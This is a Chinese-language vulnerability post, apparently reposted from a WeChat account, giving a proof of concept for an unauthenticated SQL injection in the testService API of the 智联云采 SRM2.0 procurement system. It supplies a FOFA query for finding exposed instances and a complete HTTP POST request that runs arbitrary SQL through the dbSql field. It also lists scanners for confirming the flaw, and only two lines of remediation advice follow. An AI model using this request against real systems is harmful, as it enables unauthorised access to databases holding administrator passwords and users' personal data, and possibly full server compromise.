智联云采 SRM2.0 testService SQL注入漏洞 PoC

admin 2024年11月5日14:21:36评论43 views字数 941阅读3分8秒阅读模式
00产品简介

智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。

01漏洞概述
由于智联云采 SRM2.0 testService 接口可未授权执行SQL语句,存在极大的安全风险,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

02搜索引擎
FOFA: 
title=="SRM 2.0"

智联云采 SRM2.0 testService SQL注入漏洞 PoC

03漏洞复现
POST /adpweb/a/ica/api/testService HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36X-Requested-With: XMLHttpRequestContent-Type: application/json{    "dbId": "1001",    "dbSql": "#set ($lang = $lang) SELECT * FROM v$version",    "responeTemplate": "{"std_data": {"execution": {"sqlcode": "$execution.sqlcode", "description": "$execution.description"}}}",    "serviceCode": "q",    "serviceName": "q",    "serviceParams": "{"lang":"zh_CN"}"}

智联云采 SRM2.0 testService SQL注入漏洞 PoC

sqlmap验证

智联云采 SRM2.0 testService SQL注入漏洞 PoC

04
检测工具

nuclei

智联云采 SRM2.0 testService SQL注入漏洞 PoC

afrog

智联云采 SRM2.0 testService SQL注入漏洞 PoC

xray

智联云采 SRM2.0 testService SQL注入漏洞 PoC

05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、关注厂商及时更新补丁或升级至安全版本

06

原文始发于微信公众号(nday POC):智联云采 SRM2.0 testService SQL注入漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月5日14:21:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   智联云采 SRM2.0 testService SQL注入漏洞 PoChttps://cn-sec.com/archives/3355531.html

发表评论

匿名网友 填写信息